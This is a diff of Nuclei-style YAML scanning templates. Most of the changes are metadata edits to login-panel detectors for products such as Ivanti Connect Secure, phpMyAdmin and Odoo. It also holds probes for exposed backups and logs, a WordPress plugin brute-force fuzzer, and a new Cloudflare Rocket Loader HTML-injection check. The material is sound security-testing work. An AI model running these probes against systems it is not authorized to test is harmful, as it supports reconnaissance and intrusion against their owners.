# digest: 490a0046304402205b887d409f93bb8c6bca75ccede4fb4ede2c9c827e9b47af66ef16486efe5bed022013582e7154224d6596931d51c61ce2b4c11d03fc9682a4b29f4731c8cd797b21:922c64590222798bb761d5b6d8e72950

View File

@ -10,7 +10,8 @@ info:
- https://www.ibm.com/docs/en/odm/8.5.1?topic=console-tutorial-getting-started-decision-center-enterprise
metadata:
verified: true
shodan-query: html:"Decision Center Enterprise console"
shodan-query: "html:\"Decision Center Enterprise console\""
max-request: 1
tags: panel,ibm,login,detect,decision-center
http:
@ -30,4 +31,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100c1586e66a4f5b442e8b98fc0197d38db06f862c0aa724aad823686560f8af3150220651109acecc6891e0802e326f21c5261822dbc69bee767c5e4eb04cd73c0026e:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450221008667c30c6129e740f22587180d65bef7ea8c9bc5e42073143338ea019a73840d022004dfe32d460d9554f364fc00d8db42df22960b4dbfde97ec9101a158366ad22e:922c64590222798bb761d5b6d8e72950

View File

@ -10,7 +10,8 @@ info:
- https://www.ibm.com/docs/en/odm/8.12.0?topic=overview-introducing-rule-execution-server
metadata:
verified: true
shodan-query: title:"Rule Execution Server"
shodan-query: "title:\"Rule Execution Server\""
max-request: 1
tags: panel,ibm,login,detect,decision-server
http:
@ -30,4 +31,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502204d00e79a36864310511d3945c877939d641c2eacd7d408a2786aa413851bacd0022100f12605169ab70c9beb895a8691d7cb6f2ca099f3c6bdc7ffe6c2f7b818010135:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100f8a6779c2c863e990a8f3761c1fbc8d9a2aac9c60e69c8feb80a9b48a5660cf102207f75f60642c2257b39595c992440af15edf913738771b226230ebd0d27350410:922c64590222798bb761d5b6d8e72950

View File

@ -10,7 +10,8 @@ info:
- https://www.ibm.com/docs/en/odm/8.12.0
metadata:
verified: true
fofa-query: title="Decision Center | Business Console"
fofa-query: "title=\"Decision Center | Business Console\""
max-request: 1
tags: panel,ibm,login,detect,decision-center
http:
@ -28,4 +29,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100d52dbff62d09aa1893a69601b6ebddcee476872b7bb74d935c4e313e8d76578e0220590a89cfb7fc87044c7c7dd5e7def60b1c02374a7671d2affc6a164a3045e4a8:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100b3e217aca2f0e7f4749d018a3aa54ce7d31b691b0feace4be2ea8945691b24a002210092adc4f4e4095474a2915ebe62b11db7981f79fe08a1ce086adc6ddfd2c7811a:922c64590222798bb761d5b6d8e72950

View File

@ -10,10 +10,10 @@ info:
- https://www.ivanti.com/products/connect-secure-vpn
metadata:
vendor: ivanti
product: connect_secure
product: "connect_secure"
verified: true
max-request: 1
shodan-query: title:"Ivanti Connect Secure"
max-request: 2
shodan-query: "title:\"Ivanti Connect Secure\""
tags: panel,connectsecure,login
http:
@ -35,4 +35,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100d585f9e252400d8b89e35a904465bc72b1832386ab12f0554abcefd5a8be293e02202a923fe7c0fc9e7ee34ae5f72b28a5683ab136b9a664779fc942b61847b84a52:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c4feca263103f90d4e4077e98702f3dd3dbf5c455ecfb5ed45115b96ad11372c022100ba71de0184707063914de8dee85d4e4930735f2609448a0470e38c0198003b7a:922c64590222798bb761d5b6d8e72950

View File

@ -10,12 +10,11 @@ info:
- https://www.juniper.net/documentation/us/en/software/jweb-ex/jweb-ex-application-package/topics/concept/ex-series-j-web-interface-overview.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
max-request: 1
verified: true
shodan-query: http.title:"Juniper Web Device Manager"
shodan-query: "http.title:\"Juniper Web Device Manager\""
tags: panel,juniper,vpn,login
http:
@ -43,4 +42,4 @@ http:
group: 1
regex:
- 'var modelphpStr = "(.*?)";'
# digest: 4b0a00483046022100fc6761f1e20dc648ed664ad95d12ebbf947321c37644528bc30edc2a7bc4918d0221009f32657ac7c105b55a5dbe72bb6f2d59f11c4f73563b60a96c5153f99d25b636:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205ca23f303d8fa1ef26270300c55737695329a18b419a0eaa9c633ec3d476a6b902210089ea66b95ddb52fa15accc8bebc0824d44dc509c97674017cf72d1a0ba8c0997:922c64590222798bb761d5b6d8e72950

View File

@ -10,13 +10,12 @@ info:
- https://github.com/provectus/kafka-ui
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
metadata:
vendor: provectus
product: ui
platform: kafka
max-request: 1
max-request: 2
tags: panel,kafka,apache,detect
http:
@ -45,4 +44,4 @@ http:
group: 1
regex:
- '"v([0-9.]+)"'
# digest: 490a004630440220120fd70d830d5673b6694bc74d5d5cdd0f17420aba4ae2000532dbcb795c6584022001816294148c66bde9fe384d304fd6f1b4bbedafc160454c3f9e0b5183f4e601:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502210091554843ef5d12adad3dd9e9d9ba5b82adc7a34ba448aaf4e12449bad284693e022034ed2d535005bac5972abee730948bb14439734f919d1b516f886b50ff402038:922c64590222798bb761d5b6d8e72950

View File

@ -37,9 +37,10 @@ http:
- "alt=\"Keycloak"
- "kc-form-buttons"
- "/keycloak/img/favicon.ico"
- "/admin/keycloak/"
condition: or
- type: status
status:
- 200
# digest: 4a0a00473045022100ce99a9168d9735401c84081a0b8c389cebe54d781b5616f4d42390b7b920373a02206394e01504f7c25820d9154260d135c341af22fd6e392b37412ecbd99b9403bd:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100dd6221af8f8b9f571a28611b54d652f7568da86dce1654fa1a73962e720bf2cf022100ed7bd96937ba0a702f5889f0827638671d3ffbd3e98bba852bd274542e59ae0f:922c64590222798bb761d5b6d8e72950

View File

@ -9,7 +9,8 @@ info:
- https://kopano.com/
metadata:
verified: true
shodan-query: http.title:"Kopano WebApp"
shodan-query: "http.title:\"Kopano WebApp\""
max-request: 1
tags: panel,kopano,login,detect
http:
@ -33,4 +34,4 @@ http:
group: 1
regex:
- '\?kv([0-9.]+)"'
# digest: 4a0a0047304502205ae240e238fffb87a0154ac0e19299328e5fd7f4e02f7cd8b5e0c74e304c8166022100ec2e323a3aa419e061a0504a4864efde49aa02f6272eb5b8c511960367a042e1:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220499c97ef6976f50be4391e8eeb0ddfeb3fcbe37bec5a7fe24d71c473e6b3d673022070949daf15a245428269d09199e9f2377b400261229944d98137f800b4e0f3a8:922c64590222798bb761d5b6d8e72950

View File

@ -10,7 +10,8 @@ info:
- https://github.com/linagora/linshare
metadata:
verified: true
shodan-query: http.title:"LinShare"
shodan-query: "http.title:\"LinShare\""
max-request: 3
tags: panel,linshare,login,detect
http:
@ -30,4 +31,4 @@ http:
- 'status_code == 200'
- 'contains_any(body, "<title>LinShare", "x-ng-app=\"linshareAdminApp")'
condition: and
# digest: 4a0a0047304502207dcbdcd3215abf97fd2c12ef382bf488ddfa0f31ff0f717491fd3b0bf6bd9368022100b838aab3468abf4fe5755bfdb54b4a238263bda36c0ea794d661efa2b18880f8:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ca5993c797cf75bbaa9653d71b58a8c69d527adaceac8589f0e96b9e49c8d38f02207eac6b0a379abc14b4907532c15a5ad9f9f62ef6b0852286904753a93af8019c:922c64590222798bb761d5b6d8e72950

View File

@ -2,20 +2,25 @@ id: odoo-panel
info:
name: Odoo - Panel Detect
author: DhiyaneshDK
author: DhiyaneshDK,righettod
severity: info
metadata:
vendor: odoo
product: odoo
verified: true
max-request: 1
shodan-query: title:"Odoo"
max-request: 2
shodan-query: "title:\"Odoo\""
tags: login,panel,odoo
http:
- method: GET
path:
- "{{BaseURL}}/web/login"
- "{{BaseURL}}"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
@ -23,8 +28,14 @@ http:
part: body
words:
- '<title>Odoo</title>'
- 'odoo.session_info'
- 'web.layout.odooscript'
condition: or
- type: word
part: body
words:
- 'Log in'
condition: and
- type: word
part: header
@ -34,4 +45,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100a4ee6283d4c0264ea8d9ac9e56e2c948d50afbb650ac84735d4978ada4bfcdf802207a1bf2401f730d11a14cc03bea4d3e2ac98aae9ad05856f7a41359be3b31eda1:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202c94e6e7ce327a1d5e088428410c9e0bb977cfd163434b7a8e449af58b032a9c0221009dbebd38cac6453fb54b396854eae6bcef87f5f70980bf2b82610cfb98fdcb54:922c64590222798bb761d5b6d8e72950

View File

@ -5,14 +5,14 @@ info:
author: righettod
severity: info
description: |
Passbolt login panel was detected.
Passbolt login panel was detected.
reference:
- https://www.passbolt.com/
metadata:
verified: true
shodan-query: http.title:"Passbolt | Open source password manager for teams"
shodan-query: "http.title:\"Passbolt | Open source password manager for teams\""
max-request: 1
tags: panel,passbolt,login
http:
- method: GET
path:
@ -31,4 +31,4 @@ http:
group: 1
regex:
- '(?i)v=([0-9a-z.-]+)'
# digest: 4b0a00483046022100cd46bf88248b5f3ddfbaf30d8f17602a0168b6080418f686067b8482f9b37b570221008b497e1c5529c20f6202974940db3d83ca0be3737bab1799bd727c314e17a142:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402207f1b9037354038919a4460781c2f126b5ca46c7d67c0af2aa6f9653d51573ce2022048ad39d72b06d3603428ca396cf315280273241fbf01fe026e55d2d9f9a4f964:922c64590222798bb761d5b6d8e72950

View File

@ -7,13 +7,12 @@ info:
description: phpMyAdmin panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
metadata:
shodan-query: "http.title:phpMyAdmin"
vendor: phpmyadmin
product: phpmyadmin
max-request: 12
shodan-query: http.title:phpMyAdmin
max-request: 13
tags: panel,phpmyadmin
http:
@ -46,4 +45,4 @@ http:
group: 1
regex:
- 'v=([a-z0-9-._]+)'
# digest: 490a0046304402203073d075e05bc85ce417b3db20f3c9b6c7a32c22768f7ad39c75ffa91712bb4d022006c2a3c1552f7209c345f11c66087db13eef087aff98dead27a5c4a6f0fa4f54:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205a7d1860670db2b7c7fe2c51ee5bca11729bf56ee88e3194b9f7cb90959a3ad10220664c394c6cca2ebeceb2166bc8a9d4c78b949ac13ebd420bc441fc7a22adc6af:922c64590222798bb761d5b6d8e72950

View File

@ -7,14 +7,13 @@ info:
description: Proofpoint Protection Server panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
metadata:
product: "proofpoint protection server"
shodan-query: "http.favicon.hash:942678640"
verified: true
max-request: 1
max-request: 2
vendor: proofpoint
product: proofpoint protection server
shodan-query: http.favicon.hash:942678640
tags: panel,proofpoint,login,detect
http:
@ -41,4 +40,4 @@ http:
part: header
words:
- 'PPSAUTH='
# digest: 4a0a00473045022100da651ce3e96c872c09b0efeb7f24ce435691efb6047687fa2f980969c7d32add02206cedee1a6d93fb48ac0d8c6a50883823566a3fdc0b0946e3a3d17921b76ed292:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100a1b58b379feb7b3d65301bdfd4395652cad8294c5edae415ecc4d47669e3ad1a02207e32ff2739b36c0e05a467df6fbef59f1ef6c6383b4ec9a75dbc21729f14efae:922c64590222798bb761d5b6d8e72950

View File

@ -5,9 +5,9 @@ info:
author: dadevel
severity: info
metadata:
max-request: 2
vendor: pulsesecure
product: pulse_connect_secure
max-request: 2
tags: pulse,panel
http:
@ -40,4 +40,4 @@ http:
part: body
regex:
- "(?i)<string>([^<]+)</string>"
# digest: 4a0a0047304502203aa1cb77ba86704bad2c198c7fbf07c028f96dfe80cb8d6860fbec949ba9b314022100dbe4fbc3fd5b5fb9a25b9f45063a4c986bbe786b109f9356b2da46be1eb8b4af:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100f823e5c127aced792ff96e8e9214476b414af4e1353f299d1e59d51b537e6fd3022100b1c6a628c41e09ad48d649a5dca0b9f6051955009d9de2338a4237d51322544b:922c64590222798bb761d5b6d8e72950

View File

@ -9,7 +9,8 @@ info:
- https://www.rocket.chat/
metadata:
verified: true
shodan-query: http.title:"Rocket.Chat"
shodan-query: "http.title:\"Rocket.Chat\""
max-request: 1
tags: panel,rocketchat,login,detect
http:
@ -25,4 +26,4 @@ http:
- 'status_code == 200'
- 'contains_any(body, "<title>Rocket.Chat", "content=\"Rocket.Chat")'
condition: and
# digest: 490a00463044022012e5cbbf245707dd32c566958b4c6fa7a07f06f418139ec7a81026c1f90de09a0220096635ca065674713ac77f3b305157cbfba0635b3f6e7d7da94cf8ed3f1ac1e7:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220213f92e33c7b93bd760a281dff3427b796dcb4eed73ed550941fb16abddd89180220080a30ead625b8491cb47333aff0f5d45158897773064a2aeb1baddffe94683a:922c64590222798bb761d5b6d8e72950

View File

@ -5,14 +5,15 @@ info:
author: righettod
severity: info
description: |
Sentry login panel was detected.
Sentry login panel was detected.
reference:
- https://sentry.io/
metadata:
vendor: sentry
product: sentry
verified: true
shodan-query: http.title:"Login | Sentry"
shodan-query: "http.title:\"Login | Sentry\""
max-request: 1
tags: panel,sentry,login
http:
@ -36,4 +37,4 @@ http:
group: 1
regex:
- '(?i)"current":\s*"([0-9a-z.-]+)"'
# digest: 4b0a00483046022100bc11bbc2da0eeaaeb02cfdf576e886aaad2dbc0fbf346c43f5d8242aafd24ac102210087c344fb3a27ea65932c1a1adbd8ede83fcc91914d7c39027ae096ec8cd72ac0:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b04d058d31690931f321b078a2ac12a98dbfae03861caadbc878766143783e2902207291a26d57c10aaa7dfedba3b543e898aa150509733c646e144fcd58a5758175:922c64590222798bb761d5b6d8e72950

View File

@ -9,10 +9,10 @@ info:
reference:
- https://www.truenas.com
metadata:
vendor: ixsystems
product: truenas
verified: true
max-request: 1
vendor: ixsystems
product: truenas
shodan-query: html:"TrueNAS"
tags: login,panel,truenas
@ -33,4 +33,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100dd1d5fd20c54a80d0f7d2631323b4434a2da43d683ca143da2f976cf8ab372d702201c583fae3cb0276990d9ad033e8461d795c1c7eba84d733b30cb0b2a45e60d26:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100ece185971ecd556127979d86bf7200c50f67dfaf61bb545570d1df063fd788a2022100ddaefbef6ccd73cfd9d33ba6612bfab01cd89d1c688769cc5159cfee1588d464:922c64590222798bb761d5b6d8e72950

View File

@ -5,11 +5,12 @@ info:
author: righettod
severity: info
description: |
Vista Web login panel was detected.
Vista Web login panel was detected.
reference:
- https://resa.aero/solutions-operations-facturation/vista-web/
metadata:
verified: true
max-request: 1
tags: panel,vistaweb,login
http:
@ -30,4 +31,4 @@ http:
group: 1
regex:
- 'v=([0-9.]+)'
# digest: 4b0a004830460221009afbf2bd9a3f5bfffe7e6d92b5b3f4423102532bd1114541c5258759f24bc380022100e1677ad6b53c0e42ddb24ee59efd95a0682281006b56d46e0fb15a195598ffda:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e75b80b7677ce3d46ea55b865e0c89ab12384a99ff0b565ec6e4dd49f1090a3102207c7e6629206f24058e677de683d5e3a191e9b14095a37db1469d6bfe1d00ac7b:922c64590222798bb761d5b6d8e72950

View File

@ -10,9 +10,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata:
max-request: 59
shodan-query: "http.title:\"swagger\""
verified: true
max-request: 57
shodan-query: http.title:"swagger"
tags: exposure,api,swagger
http:
@ -105,4 +105,4 @@ http:
group: 1
regex:
- " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"
# digest: 4a0a00473045022100d3639a8b44e797aa3fc7cca0bb5778f14f0d9d59ab15483940be419fa21321fa02204cbbcd636969871ac6d8cea4cb7aada40b6938b1f3314f3c235d4a80a1550bbd:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220699b1c75442a856dcd0637850a4464835dd00335e1ec2f4345bebd359e25f9af022100e79a9981d9c1330730d4f4b9fe6a2785c38be6e2ee9ad19f1df3d38694a5f97d:922c64590222798bb761d5b6d8e72950

View File

@ -10,7 +10,7 @@ info:
cvss-score: 5.3
cwe-id: CWE-200
metadata:
max-request: 1440
max-request: 1305
tags: exposure,backup
http:
@ -127,4 +127,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a004730450221009e9e29e2bc6fa477a5ef35e682ed0677d6cd6457e0516add7ba7b3657dea242c0220573cc11dd5d3c17b8bb3226a23ac6bfa501b1c7f5e337c1fdfe79e581abadeb9:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100a51f2952c9c24769da7d9ad5fa3f8ad2c01a800385052b494e5cf8b8cd2b0b2002210086e92de1a4bcde1fb7758917220ed3470e42201e239106f349d60c0e28d6452b:922c64590222798bb761d5b6d8e72950

View File

@ -8,10 +8,9 @@ info:
reference: https://www.awstats.org/docs/awstats_setup.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
metadata:
max-request: 3
max-request: 4
tags: config,exposure,awstats
http:
@ -36,4 +35,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100a1d5304bdbe5718f9bb640888a5db388a5558f54e61dd1b5154393c62febb940022100a7d26343bf553aacbf42a7d583dc4bb2d4222a7fe0d08eae43078c91e82029f2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220627e9e39ded451b53e2044aebb66514409fa81010ab0676b9ac36403755c30110221009aeb142c34946a6588ea2a98ebfece9603c77169ee688104cc8e6408be7b3c0d:922c64590222798bb761d5b6d8e72950

View File

@ -8,7 +8,7 @@ info:
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/roundcube-log-disclosure.json
metadata:
max-request: 12
max-request: 16
tags: exposure,logs
http:
@ -57,4 +57,4 @@ http:
- type: dsl
dsl:
- content_length
# digest: 4a0a0047304502210092febbf3f9906523788e68550f93dd10480ff15eb53ab20a8c452c482c7cd380022061f77b2b8a8ae9439fe60c5d02731b99246b700d7d38cac9608bced9885ba4a3:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100f29f0edc0fd1c21ddc672864cdd1b0e8f9b6bf2fd245e63e3a18e009f87dda4802210094fc7c7162920f3d1b9a810729c4ac860b27bb6b73a4fe837009758cf4ee4fae:922c64590222798bb761d5b6d8e72950

View File

@ -5,7 +5,7 @@ info:
author: 0xcrypto
severity: info
metadata:
max-request: 98135
max-request: 100563
tags: fuzzing,bruteforce,wordpress
http:
@ -35,4 +35,4 @@ http:
regex:
- "===\\s(.*)\\s===" # extract the plugin name
- "(?m)Stable tag: ([0-9.]+)" # extract the plugin version
# digest: 4b0a00483046022100bc606e0746f263229a02d000cd84aafb581fcdf5d93f151e4de17e328f47291b022100a600a40ce1fbd7cab94ccc994cd355edf9dc15ed337d21d28b414705b5324161:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022011ffc9134eaa01b62eddcdbbc33af59e33613478dd206665d9f12d60ea4fe114022100a6845b777b51f0d3959d009a91f612b73b13c9a5dc6fe6d058bd37994d64fe6a:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,40 @@
id: cloudflare-rocketloader-htmli
info:
name: Cloudflare Rocket Loader - HTML Injection
author: j3ssie
severity: low
description: |
The Rocket Loader feature in Cloudflare allow attackers to inject arbitrary HTML into the website. This can be used to perform various attacks such as phishing, defacement, etc.
reference:
- https://developers.cloudflare.com/speed/optimization/content/rocket-loader/enable/
metadata:
max-request: 1
verified: true
tags: misconfig,cloudflare,htmli
http:
- method: GET
path:
- "{{BaseURL}}/cdn-cgi/image/width=1000,format=auto/https://raw.githubusercontent.com/simple-icons/simple-icons/develop/icons/cloudflare.svg"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Cloudflare'
- '<svg'
- 'M16.5088 16.8447c.1475-.5068.0908-.9707-.1553-1.3154-.2246-.3164-.6045-.499-1.0615-.5205l-'
- '1475.5068-.0918.9707.1543 1.3164.2256.3164.6055.498'
condition: and
- type: word
part: header
words:
- 'image/svg+xml'
- type: status
status:
- 200
# digest: 4a0a0047304502203f1f9450ea215136ca621ee9dbedce3ae4455abcc8dd73db23c5e0cdde586076022100f02e51d462db656b75f00a878d4608aed164f4cc5492a86cb73fd88a1665a085:922c64590222798bb761d5b6d8e72950

View File

@ -10,8 +10,9 @@ info:
- https://github.com/thewhiteh4t/killcast/blob/ee81cfa03c963d47d3335770fcea2ca48bddeabf/killcast.py#L100C25-L100C43
- https://rithvikvibhu.github.io/GHLocalApi/#section/Google-Home-Local-API/Authentication
metadata:
shodan-query: "Chromecast"
verified: true
max-request: 1
shodan-query: Chromecast
tags: google,chromecast,detect
http:
@ -32,4 +33,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a004730450221009d996dd528a6470315f3ef08c7de657ec6203185d235eb7877324aeb51c17c29022078f0723a1a04cc66cea30f0a15c736c5701e1062d0d40436d5f177e847865396:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950

View File

@ -10,7 +10,8 @@ info:
- https://www.ibm.com/products/operational-decision-manager
metadata:
verified: true
fofa-query: icon_hash="707491698"
fofa-query: "icon_hash=\"707491698\""
max-request: 1
tags: ibm,decision-center,tech,detect
http:
@ -28,4 +29,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100a59aa313dd5de76ccd37ff23f84ea70c006cf6902d856db566f35dd35a4091250221008aa670d5443398d03af2bd250cf3d43d379ff8c32783e9f9de3bb9c7af63ad0e:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220145ded2786c1d6f03455e511dd78e011fec59080659837fcc214ab4d5fa13b930220173f1a21d9016bd6415376e6b6963b1964e29cc705c87c6b10ee14d6f0eeb176:922c64590222798bb761d5b6d8e72950

Some files were not shown because too many files have changed in this diff Show More